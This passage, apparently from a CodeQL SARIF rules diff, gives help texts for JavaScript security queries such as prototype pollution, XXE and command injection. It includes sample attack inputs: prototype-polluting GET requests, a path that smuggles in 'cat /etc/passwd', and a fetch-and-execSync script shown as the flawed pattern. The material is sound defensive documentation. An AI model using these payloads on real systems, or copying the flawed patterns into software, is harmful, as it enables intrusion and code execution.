object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`. 
An attacker can abuse this by sending an object with these property names and thereby modify `Object.prototype`.\n\n\n## Recommendation\nUpdate your library dependencies in order to use a safe version of the *merge* or *extend* function. If your library has no fixed version, switch to another library.\n\n\n## Example\nIn the example below, the untrusted value `req.query.prefs` is parsed as JSON and then copied into a new object:\n\n\n```javascript\napp.get('/news', (req, res) => {\n let prefs = lodash.merge({}, JSON.parse(req.query.prefs));\n})\n\n```\nPrior to lodash 4.17.11 this would be vulnerable to prototype pollution. An attacker could send the following GET request:\n\n```\nGET /news?prefs={\"constructor\":{\"prototype\":{\"xxx\":true}}}\n```\nThis causes the `xxx` property to be injected on `Object.prototype`. Fix this by updating the lodash version:\n\n\n```json\n{\n \"dependencies\": {\n \"lodash\": \"^4.17.12\"\n }\n}\n\n```\nNote that some web frameworks, such as Express, parse query parameters using extended URL-encoding by default. When this is the case, the application may be vulnerable even if not using `JSON.parse`. 
The example below would also be susceptible to prototype pollution:\n\n\n```javascript\napp.get('/news', (req, res) => {\n let config = lodash.merge({}, {\n prefs: req.query.prefs\n });\n})\n\n```\nIn the above example, an attacker can cause prototype pollution by sending the following GET request:\n\n```\nGET /news?prefs[constructor][prototype][xxx]=true\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Express: [urlencoded()](https://expressjs.com/en/api.html#express.urlencoded)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n", + "markdown" : "# Prototype-polluting merge call\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from an untrusted source object. 
Such a call can modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`. An attacker can abuse this by sending an object with these property names and thereby modify `Object.prototype`.\n\n\n## Recommendation\nUpdate your library dependencies in order to use a safe version of the *merge* or *extend* function. If your library has no fixed version, switch to another library.\n\n\n## Example\nIn the example below, the untrusted value `req.query.prefs` is parsed as JSON and then copied into a new object:\n\n\n```javascript\napp.get('/news', (req, res) => {\n let prefs = lodash.merge({}, JSON.parse(req.query.prefs));\n})\n\n```\nPrior to lodash 4.17.11 this would be vulnerable to prototype pollution. An attacker could send the following GET request:\n\n```\nGET /news?prefs={\"constructor\":{\"prototype\":{\"xxx\":true}}}\n```\nThis causes the `xxx` property to be injected on `Object.prototype`. Fix this by updating the lodash version:\n\n\n```json\n{\n \"dependencies\": {\n \"lodash\": \"^4.17.12\"\n }\n}\n\n```\nNote that some web frameworks, such as Express, parse query parameters using extended URL-encoding by default. When this is the case, the application may be vulnerable even if not using `JSON.parse`. 
The example below would also be susceptible to prototype pollution:\n\n\n```javascript\napp.get('/news', (req, res) => {\n let config = lodash.merge({}, {\n prefs: req.query.prefs\n });\n})\n\n```\nIn the above example, an attacker can cause prototype pollution by sending the following GET request:\n\n```\nGET /news?prefs[constructor][prototype][xxx]=true\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Express: [urlencoded()](https://expressjs.com/en/api.html#express.urlencoded)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-078", "external/cwe/cwe-079", "external/cwe/cwe-094", "external/cwe/cwe-400", "external/cwe/cwe-471", "external/cwe/cwe-915" ], + "description" : "Recursively merging a user-controlled object into another object\n can allow an attacker to modify the built-in Object prototype,\n and possibly escalate to remote code execution or cross-site scripting.", + "id" : "js/prototype-pollution", + "kind" : "path-problem", + "name" : "Prototype-polluting merge call", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/insecure-download", + "name" : "js/insecure-download", + 
"shortDescription" : { + "text" : "Download of sensitive file through insecure connection" + }, + "fullDescription" : { + "text" : "Downloading executables and other sensitive files over an insecure connection opens up for potential man-in-the-middle attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Download of sensitive file through insecure connection\nDownloading executables or other sensitive files over an unencrypted connection can leave a server open to man-in-the-middle attacks (MITM). Such an attack can allow an attacker to insert arbitrary content into the downloaded file, and in the worst case, allow the attacker to execute arbitrary code on the vulnerable system.\n\n\n## Recommendation\nUse a secure transfer protocol when downloading executables or other sensitive files.\n\n\n## Example\nIn this example, a server downloads a shell script from a remote URL using the `node-fetch` library, and then executes this shell script.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('http://mydownload.example.org/myscript.sh')\n .then(res => res.text())\n .then(script => cp.execSync(script));\n```\nThe HTTP protocol is vulnerable to MITM, and thus an attacker could potentially replace the downloaded shell script with arbitrary code, which gives the attacker complete control over the system.\n\nThe issue has been fixed in the example below by replacing the HTTP protocol with the HTTPS protocol.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('https://mydownload.example.org/myscript.sh')\n .then(res => res.text())\n .then(script => cp.execSync(script));\n```\n\n## References\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n", + "markdown" : "# 
Download of sensitive file through insecure connection\nDownloading executables or other sensitive files over an unencrypted connection can leave a server open to man-in-the-middle attacks (MITM). Such an attack can allow an attacker to insert arbitrary content into the downloaded file, and in the worst case, allow the attacker to execute arbitrary code on the vulnerable system.\n\n\n## Recommendation\nUse a secure transfer protocol when downloading executables or other sensitive files.\n\n\n## Example\nIn this example, a server downloads a shell script from a remote URL using the `node-fetch` library, and then executes this shell script.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('http://mydownload.example.org/myscript.sh')\n .then(res => res.text())\n .then(script => cp.execSync(script));\n```\nThe HTTP protocol is vulnerable to MITM, and thus an attacker could potentially replace the downloaded shell script with arbitrary code, which gives the attacker complete control over the system.\n\nThe issue has been fixed in the example below by replacing the HTTP protocol with the HTTPS protocol.\n\n\n```javascript\nconst fetch = require(\"node-fetch\");\nconst cp = require(\"child_process\");\n\nfetch('https://mydownload.example.org/myscript.sh')\n .then(res => res.text())\n .then(script => cp.execSync(script));\n```\n\n## References\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-829" ], + "description" : "Downloading executables and other sensitive files over an insecure connection\n opens up for potential man-in-the-middle attacks.", + "id" : "js/insecure-download", + "kind" : "path-problem", + "name" : "Download of sensitive file through insecure connection", + "precision" : "high", + 
"problem.severity" : "error", + "security-severity" : "8.1" + } + }, { + "id" : "js/xxe", + "name" : "js/xxe", + "shortDescription" : { + "text" : "XML external entity expansion" + }, + "fullDescription" : { + "text" : "Parsing user input as an XML document with external entity expansion is vulnerable to XXE attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# XML external entity expansion\nParsing untrusted XML files with a weakly configured XML parser may lead to an XML External Entity (XXE) attack. This type of attack uses external entity references to access arbitrary files on a system, carry out denial-of-service (DoS) attacks, or server-side request forgery. Even when the result of parsing is not returned to the user, DoS attacks are still possible and out-of-band data retrieval techniques may allow attackers to steal sensitive data.\n\n\n## Recommendation\nThe easiest way to prevent XXE attacks is to disable external entity handling when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxml`, disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action needs to be taken.\n\n\n## Example\nThe following example uses the `libxml` XML parser to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to an XXE attack, since the parser is invoked with the `noent` option set to `true`:\n\n\n```javascript\nconst app = require(\"express\")(),\n libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n doc = libxml.parseXml(xmlSrc, { noent: true });\n});\n\n```\nTo guard against XXE attacks, the `noent` option should be omitted or set to `false`. This means that no entity expansion is undertaken at all, not even for standard internal entities such as `&` or `>`. 
If desired, these entities can be expanded in a separate step using utility functions provided by libraries such as [underscore](http://underscorejs.org/#unescape), [lodash](https://lodash.com/docs/4.17.15#unescape) or [he](https://github.com/mathiasbynens/he).\n\n\n```javascript\nconst app = require(\"express\")(),\n libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n doc = libxml.parseXml(xmlSrc);\n});\n\n```\n\n## References\n* OWASP: [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing).\n* Timothy Morgen: [XML Schema, DTD, and Entity Attacks](https://research.nccgroup.com/2014/05/19/xml-schema-dtd-and-entity-attacks-a-compendium-of-known-techniques/).\n* Timur Yunusov, Alexey Osipov: [XML Out-Of-Band Data Retrieval](https://www.slideshare.net/qqlan/bh-ready-v4).\n* Common Weakness Enumeration: [CWE-611](https://cwe.mitre.org/data/definitions/611.html).\n* Common Weakness Enumeration: [CWE-827](https://cwe.mitre.org/data/definitions/827.html).\n", + "markdown" : "# XML external entity expansion\nParsing untrusted XML files with a weakly configured XML parser may lead to an XML External Entity (XXE) attack. This type of attack uses external entity references to access arbitrary files on a system, carry out denial-of-service (DoS) attacks, or server-side request forgery. Even when the result of parsing is not returned to the user, DoS attacks are still possible and out-of-band data retrieval techniques may allow attackers to steal sensitive data.\n\n\n## Recommendation\nThe easiest way to prevent XXE attacks is to disable external entity handling when parsing untrusted data. How this is done depends on the library being used. 
Note that some libraries, such as recent versions of `libxml`, disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action needs to be taken.\n\n\n## Example\nThe following example uses the `libxml` XML parser to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to an XXE attack, since the parser is invoked with the `noent` option set to `true`:\n\n\n```javascript\nconst app = require(\"express\")(),\n libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n doc = libxml.parseXml(xmlSrc, { noent: true });\n});\n\n```\nTo guard against XXE attacks, the `noent` option should be omitted or set to `false`. This means that no entity expansion is undertaken at all, not even for standard internal entities such as `&` or `>`. If desired, these entities can be expanded in a separate step using utility functions provided by libraries such as [underscore](http://underscorejs.org/#unescape), [lodash](https://lodash.com/docs/4.17.15#unescape) or [he](https://github.com/mathiasbynens/he).\n\n\n```javascript\nconst app = require(\"express\")(),\n libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n doc = libxml.parseXml(xmlSrc);\n});\n\n```\n\n## References\n* OWASP: [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing).\n* Timothy Morgen: [XML Schema, DTD, and Entity Attacks](https://research.nccgroup.com/2014/05/19/xml-schema-dtd-and-entity-attacks-a-compendium-of-known-techniques/).\n* Timur Yunusov, Alexey Osipov: [XML Out-Of-Band Data Retrieval](https://www.slideshare.net/qqlan/bh-ready-v4).\n* Common Weakness Enumeration: [CWE-611](https://cwe.mitre.org/data/definitions/611.html).\n* Common Weakness Enumeration: [CWE-827](https://cwe.mitre.org/data/definitions/827.html).\n" + }, + "properties" : { + "tags" : [ "security", 
"external/cwe/cwe-611", "external/cwe/cwe-827" ], + "description" : "Parsing user input as an XML document with external\n entity expansion is vulnerable to XXE attacks.", + "id" : "js/xxe", + "kind" : "path-problem", + "name" : "XML external entity expansion", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.1" + } + }, { + "id" : "js/insecure-randomness", + "name" : "js/insecure-randomness", + "shortDescription" : { + "text" : "Insecure randomness" + }, + "fullDescription" : { + "text" : "Using a cryptographically weak pseudo-random number generator to generate a security-sensitive value may allow an attacker to predict what value will be generated." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Insecure randomness\nUsing a cryptographically weak pseudo-random number generator to generate a security-sensitive value, such as a password, makes it easier for an attacker to predict the value.\n\nPseudo-random number generators generate a sequence of numbers that only approximates the properties of random numbers. The sequence is not truly random because it is completely determined by a relatively small set of initial values, the seed. If the random number generator is cryptographically weak, then this sequence may be easily predictable through outside observations.\n\n\n## Recommendation\nUse a cryptographically secure pseudo-random number generator if the output is to be used in a security-sensitive context. As a rule of thumb, a value should be considered \"security-sensitive\" if predicting it would allow the attacker to perform an action that they would otherwise be unable to perform. For example, if an attacker could predict the random password generated for a new user, they would be able to log in as that new user.\n\nFor JavaScript on the NodeJS platform, `crypto.getRandomBytes` provides a cryptographically secure pseudo-random byte generator. 
Note that the conversion from bytes to numbers can introduce bias that breaks the security.\n\nFor JavaScript in the browser, `RandomSource.getRandomValues` provides a cryptographically secure pseudo-random number generator.\n\n\n## Example\nThe following examples show different ways of generating a password.\n\nIn the first case, we generate a fresh password by appending a random integer to the end of a static string. The random number generator used (`Math.random`) is not cryptographically secure, so it may be possible for an attacker to predict the generated password.\n\n\n```javascript\nfunction insecurePassword() {\n // BAD: the random suffix is not cryptographically secure\n var suffix = Math.random();\n var password = \"myPassword\" + suffix;\n return password;\n}\n\n```\nIn the second example, a cryptographically secure random number generator is used for the same purpose. In this case, it is much harder to predict the generated integers.\n\n\n```javascript\nfunction securePassword() {\n // GOOD: the random suffix is cryptographically secure\n var suffix = window.crypto.getRandomValues(new Uint32Array(1))[0];\n var password = \"myPassword\" + suffix;\n return password;\n}\n\n```\n\n## References\n* Wikipedia: [Pseudo-random number generator](http://en.wikipedia.org/wiki/Pseudorandom_number_generator).\n* Mozilla Developer Network: [RandomSource.getRandomValues](https://developer.mozilla.org/en-US/docs/Web/API/RandomSource/getRandomValues).\n* NodeJS: [crypto.randomBytes](https://nodejs.org/api/crypto.html#crypto_crypto_randombytes_size_callback)\n* Common Weakness Enumeration: [CWE-338](https://cwe.mitre.org/data/definitions/338.html).\n", + "markdown" : "# Insecure randomness\nUsing a cryptographically weak pseudo-random number generator to generate a security-sensitive value, such as a password, makes it easier for an attacker to predict the value.\n\nPseudo-random number generators generate a sequence of numbers that only approximates the properties of 
random numbers. The sequence is not truly random because it is completely determined by a relatively small set of initial values, the seed. If the random number generator is cryptographically weak, then this sequence may be easily predictable through outside observations.\n\n\n## Recommendation\nUse a cryptographically secure pseudo-random number generator if the output is to be used in a security-sensitive context. As a rule of thumb, a value should be considered \"security-sensitive\" if predicting it would allow the attacker to perform an action that they would otherwise be unable to perform. For example, if an attacker could predict the random password generated for a new user, they would be able to log in as that new user.\n\nFor JavaScript on the NodeJS platform, `crypto.getRandomBytes` provides a cryptographically secure pseudo-random byte generator. Note that the conversion from bytes to numbers can introduce bias that breaks the security.\n\nFor JavaScript in the browser, `RandomSource.getRandomValues` provides a cryptographically secure pseudo-random number generator.\n\n\n## Example\nThe following examples show different ways of generating a password.\n\nIn the first case, we generate a fresh password by appending a random integer to the end of a static string. The random number generator used (`Math.random`) is not cryptographically secure, so it may be possible for an attacker to predict the generated password.\n\n\n```javascript\nfunction insecurePassword() {\n // BAD: the random suffix is not cryptographically secure\n var suffix = Math.random();\n var password = \"myPassword\" + suffix;\n return password;\n}\n\n```\nIn the second example, a cryptographically secure random number generator is used for the same purpose. 
In this case, it is much harder to predict the generated integers.\n\n\n```javascript\nfunction securePassword() {\n // GOOD: the random suffix is cryptographically secure\n var suffix = window.crypto.getRandomValues(new Uint32Array(1))[0];\n var password = \"myPassword\" + suffix;\n return password;\n}\n\n```\n\n## References\n* Wikipedia: [Pseudo-random number generator](http://en.wikipedia.org/wiki/Pseudorandom_number_generator).\n* Mozilla Developer Network: [RandomSource.getRandomValues](https://developer.mozilla.org/en-US/docs/Web/API/RandomSource/getRandomValues).\n* NodeJS: [crypto.randomBytes](https://nodejs.org/api/crypto.html#crypto_crypto_randombytes_size_callback)\n* Common Weakness Enumeration: [CWE-338](https://cwe.mitre.org/data/definitions/338.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-338" ], + "description" : "Using a cryptographically weak pseudo-random number generator to generate a\n security-sensitive value may allow an attacker to predict what value will\n be generated.", + "id" : "js/insecure-randomness", + "kind" : "path-problem", + "name" : "Insecure randomness", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/insufficient-key-size", + "name" : "js/insufficient-key-size", + "shortDescription" : { + "text" : "Use of a weak cryptographic key" + }, + "fullDescription" : { + "text" : "Using a weak cryptographic key can allow an attacker to compromise security." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Use of a weak cryptographic key\nModern encryption relies on it being computationally infeasible to break the cipher and decode a message without the key. 
As computational power increases, the ability to break ciphers grows and keys need to become larger.\n\n\n## Recommendation\nAn encryption key should be at least 2048-bit long when using RSA encryption, and 128-bit long when using symmetric encryption.\n\n\n## References\n* Wikipedia: [RSA](https://en.wikipedia.org/wiki/RSA_(cryptosystem)).\n* Wikipedia: [AES](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard).\n* NodeJS: [Crypto](https://nodejs.org/api/crypto.html).\n* NIST: [ Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* Wikipedia: [Key size](https://en.wikipedia.org/wiki/Key_size)\n* Common Weakness Enumeration: [CWE-326](https://cwe.mitre.org/data/definitions/326.html).\n", + "markdown" : "# Use of a weak cryptographic key\nModern encryption relies on it being computationally infeasible to break the cipher and decode a message without the key. As computational power increases, the ability to break ciphers grows and keys need to become larger.\n\n\n## Recommendation\nAn encryption key should be at least 2048-bit long when using RSA encryption, and 128-bit long when using symmetric encryption.\n\n\n## References\n* Wikipedia: [RSA](https://en.wikipedia.org/wiki/RSA_(cryptosystem)).\n* Wikipedia: [AES](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard).\n* NodeJS: [Crypto](https://nodejs.org/api/crypto.html).\n* NIST: [ Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* Wikipedia: [Key size](https://en.wikipedia.org/wiki/Key_size)\n* Common Weakness Enumeration: [CWE-326](https://cwe.mitre.org/data/definitions/326.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-326" ], + "description" : "Using a weak cryptographic key can allow an attacker to compromise security.", + "id" : 
"js/insufficient-key-size", + "kind" : "problem", + "name" : "Use of a weak cryptographic key", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/shell-command-injection-from-environment", + "name" : "js/shell-command-injection-from-environment", + "shortDescription" : { + "text" : "Shell command built from environment values" + }, + "fullDescription" : { + "text" : "Building a shell command string with values from the enclosing environment may cause subtle bugs or vulnerabilities." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Shell command built from environment values\nDynamically constructing a shell command with values from the local environment, such as file paths, may inadvertently change the meaning of the shell command. Such changes can occur when an environment value contains characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, use hard-coded string literals to specify the shell command to run, and provide the dynamic arguments to the shell command separately to avoid interpretation by the shell.\n\nAlternatively, if the shell command must be constructed dynamically, then add code to ensure that special characters in environment values do not alter the shell command unexpectedly.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that recursively removes a temporary directory that is located next to the currently executing JavaScript file. 
Such utilities are often found in custom build scripts.\n\n\n```javascript\nvar cp = require(\"child_process\"),\n path = require(\"path\");\nfunction cleanupTemp() {\n let cmd = \"rm -rf \" + path.join(__dirname, \"temp\");\n cp.execSync(cmd); // BAD\n}\n\n```\nThe shell command will, however, fail to work as intended if the absolute path of the script's directory contains spaces. In that case, the shell command will interpret the absolute path as multiple paths, instead of a single path.\n\nFor instance, if the absolute path of the temporary directory is `/home/username/important project/temp`, then the shell command will recursively delete `/home/username/important` and `project/temp`, where the latter path gets resolved relative to the working directory of the JavaScript process.\n\nEven worse, although less likely, a malicious user could provide the path `/home/username/; cat /etc/passwd #/important project/temp` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the directory as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n path = require(\"path\");\nfunction cleanupTemp() {\n let cmd = \"rm\",\n args = [\"-rf\", path.join(__dirname, \"temp\")];\n cp.execFileSync(cmd, args); // GOOD\n}\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", + "markdown" : "# Shell command built from environment values\nDynamically constructing a shell command with values from the local environment, such as file paths, may inadvertently change the meaning of the shell command. Such changes can occur when an environment value contains characters that the shell interprets in a special way, for instance quotes and spaces. 
This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, use hard-coded string literals to specify the shell command to run, and provide the dynamic arguments to the shell command separately to avoid interpretation by the shell.\n\nAlternatively, if the shell command must be constructed dynamically, then add code to ensure that special characters in environment values do not alter the shell command unexpectedly.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that recursively removes a temporary directory that is located next to the currently executing JavaScript file. Such utilities are often found in custom build scripts.\n\n\n```javascript\nvar cp = require(\"child_process\"),\n path = require(\"path\");\nfunction cleanupTemp() {\n let cmd = \"rm -rf \" + path.join(__dirname, \"temp\");\n cp.execSync(cmd); // BAD\n}\n\n```\nThe shell command will, however, fail to work as intended if the absolute path of the script's directory contains spaces. 
In that case, the shell command will interpret the absolute path as multiple paths, instead of a single path.\n\nFor instance, if the absolute path of the temporary directory is `/home/username/important project/temp`, then the shell command will recursively delete `/home/username/important` and `project/temp`, where the latter path gets resolved relative to the working directory of the JavaScript process.\n\nEven worse, although less likely, a malicious user could provide the path `/home/username/; cat /etc/passwd #/important project/temp` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the directory as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n path = require(\"path\");\nfunction cleanupTemp() {\n let cmd = \"rm\",\n args = [\"-rf\", path.join(__dirname, \"temp\")];\n cp.execFileSync(cmd, args); // GOOD\n}\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], + "description" : "Building a shell command string with values from the enclosing\n environment may cause subtle bugs or vulnerabilities.", + "id" : "js/shell-command-injection-from-environment", + "kind" : "path-problem", + "name" : "Shell command built from environment values", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.3" + } + }, { + "id" : "js/second-order-command-line-injection", + "name" : "js/second-order-command-line-injection", + "shortDescription" : { + "text" : "Second order command injection" + }, + "fullDescription" : { + "text" : "Using user-controlled data as arguments to some 
commands, such as git clone, can allow arbitrary commands to be executed." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Second order command injection\nSome shell commands, like `git ls-remote`, can execute arbitrary commands if a user provides a malicious URL that starts with `--upload-pack`. This can be used to execute arbitrary code on the server.\n\n\n## Recommendation\nSanitize user input before passing it to the shell command. For example, ensure that URLs are valid and do not contain malicious commands.\n\n\n## Example\nThe following example shows code that executes `git ls-remote` on a URL that can be controlled by a malicious user.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n const remote = req.query.remote;\n cp.execFile(\"git\", [\"ls-remote\", remote]); // NOT OK\n});\n\n```\nThe problem has been fixed in the snippet below, where the URL is validated before being passed to the shell command.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n const remote = req.query.remote;\n if (!(remote.startsWith(\"git@\") || remote.startsWith(\"https://\"))) {\n throw new Error(\"Invalid remote: \" + remote);\n }\n cp.execFile(\"git\", [\"ls-remote\", remote]); // OK\n});\n\n```\n\n## References\n* Max Justicz: [Hacking 3,000,000 apps at once through CocoaPods](https://justi.cz/security/2021/04/20/cocoapods-rce.html).\n* Git: [Git - git-ls-remote Documentation](https://git-scm.com/docs/git-ls-remote/2.22.0#Documentation/git-ls-remote.txt---upload-packltexecgt).\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: 
[CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", + "markdown" : "# Second order command injection\nSome shell commands, like `git ls-remote`, can execute arbitrary commands if a user provides a malicious URL that starts with `--upload-pack`. This can be used to execute arbitrary code on the server.\n\n\n## Recommendation\nSanitize user input before passing it to the shell command. For example, ensure that URLs are valid and do not contain malicious commands.\n\n\n## Example\nThe following example shows code that executes `git ls-remote` on a URL that can be controlled by a malicious user.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n const remote = req.query.remote;\n cp.execFile(\"git\", [\"ls-remote\", remote]); // NOT OK\n});\n\n```\nThe problem has been fixed in the snippet below, where the URL is validated before being passed to the shell command.\n\n\n```javascript\nconst express = require(\"express\");\nconst app = express();\n\nconst cp = require(\"child_process\");\n\napp.get(\"/ls-remote\", (req, res) => {\n const remote = req.query.remote;\n if (!(remote.startsWith(\"git@\") || remote.startsWith(\"https://\"))) {\n throw new Error(\"Invalid remote: \" + remote);\n }\n cp.execFile(\"git\", [\"ls-remote\", remote]); // OK\n});\n\n```\n\n## References\n* Max Justicz: [Hacking 3,000,000 apps at once through CocoaPods](https://justi.cz/security/2021/04/20/cocoapods-rce.html).\n* Git: [Git - git-ls-remote Documentation](https://git-scm.com/docs/git-ls-remote/2.22.0#Documentation/git-ls-remote.txt---upload-packltexecgt).\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" + }, + "properties" : { + "tags" : [ 
"correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], + "description" : "Using user-controlled data as arguments to some commands, such as git clone,\n can allow arbitrary commands to be executed.", + "id" : "js/second-order-command-line-injection", + "kind" : "path-problem", + "name" : "Second order command injection", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.0" + } + }, { + "id" : "js/command-line-injection", + "name" : "js/command-line-injection", + "shortDescription" : { + "text" : "Uncontrolled command line" + }, + "fullDescription" : { + "text" : "Using externally controlled strings in a command line may allow a malicious user to change the meaning of the command." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Uncontrolled command line\nCode that passes untrusted user input directly to `child_process.exec` or similar APIs that execute shell commands allows the user to execute malicious code.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and that accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. 
